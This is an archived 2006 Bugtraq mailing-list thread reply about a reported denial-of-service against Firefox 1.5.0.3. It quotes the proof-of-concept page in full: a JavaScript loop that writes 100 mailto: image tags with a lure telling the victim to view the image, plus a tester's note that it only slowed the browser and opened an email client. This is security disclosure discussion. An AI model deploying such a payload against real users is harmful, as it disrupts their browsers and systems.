Bugtraq mailing list archives
Re: Firefox 1.5.0.3 - DoS
From: RSnake <rsnake () shocking com>
Date: Wed, 10 May 2006 13:33:32 -0700 (PDT)
This is similar to something I've been toying with for a while: http://ha.ckers.org/weird/ (the first link "mailto: memory exhaustion) is around this issue). The only difference is my test page does not rely on JavaScript which seems to have a more dramatic (read annoying) effect. On Wed, 10 May 2006, Chris Horry wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 p4.werterxyz () gmail com wrote:test2: http://werterxyz.altervista.org/test2.html http://geocities.com/werterxyz/test2.htmlDid not crash FF 1.5.0.3 on Windows Server 2003 SP1 (slowed it down for a few seconds and launched Outlook Express, but that's it). Here is the code since the original poster didn't see fit to publish it. <Head> <Title>test2 by P4</Title> </Head> <Body> <!-- following code added by server. PLEASE REMOVE --> <!-- preceding code added by server. PLEASE REMOVE --> <SCRIPT Language="Javascript"> for(i=0; i<100; i++){ document.write('<Img src="mailto:test () test com?subject=test email&body=Sei fottuto!"> clicka col tasto destro del mouse e seleziona "Mostra immagine" (View Image)') } </SCRIPT> </Body> <!-- text below generated by server. PLEASE REMOVE - --></object></layer></div></span></style></noscript></table></script></applet><script language="JavaScript" src="http://us.i1.yimg.com/us.yimg.com/i/mc/mc.js"></script><script language="JavaScript" src="http://geocities.com/js_source/geov2.js"></script><script language="javascript">geovisit();</script><noscript><img src="http://visit.geocities.yahoo.com/visit.gif?us1147288798" alt="setstats" border="0" width="1" height="1"></noscript> <IMG SRC="http://geo.yahoo.com/serv?s=76001067&t=1147288798&f=us-w61" ALT=1 WIDTH=1 HEIGHT=1>Saluti da P4- -- Chris Horry KG4TSM "A conservative is a man with two perfectly zerbey () wibble co uk good legs who, however, has never learned how http://www.wibble.co.uk to walk forward". -- Franklin D. Roosevelt -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFEYj3pnAAeGCtMZU4RAuEAAJ92SdxcNR0ALLdqrC6/CgTOve8UXwCfRkgF 9DAmdMxX5LaboCYnYTtr4GM= =z8eV -----END PGP SIGNATURE-----
-RSnake http://ha.ckers.org/
Current thread:
- Firefox 1.5.0.3 - DoS p4 . werterxyz (May 10)
- Re: Firefox 1.5.0.3 - DoS Chris Horry (May 10)
- Re: Firefox 1.5.0.3 - DoS RSnake (May 12)
- Re: Firefox 1.5.0.3 - DoS Flavio Visentin (May 12)
- Re: Firefox 1.5.0.3 - DoS Ronald van den Blink (May 15)
- <Possible follow-ups>
- Re: Firefox 1.5.0.3 - DoS marrob (May 12)
- Re: Re: Firefox 1.5.0.3 - DoS Ronald (May 15)
- Re: Firefox 1.5.0.3 - DoS Chris Horry (May 10)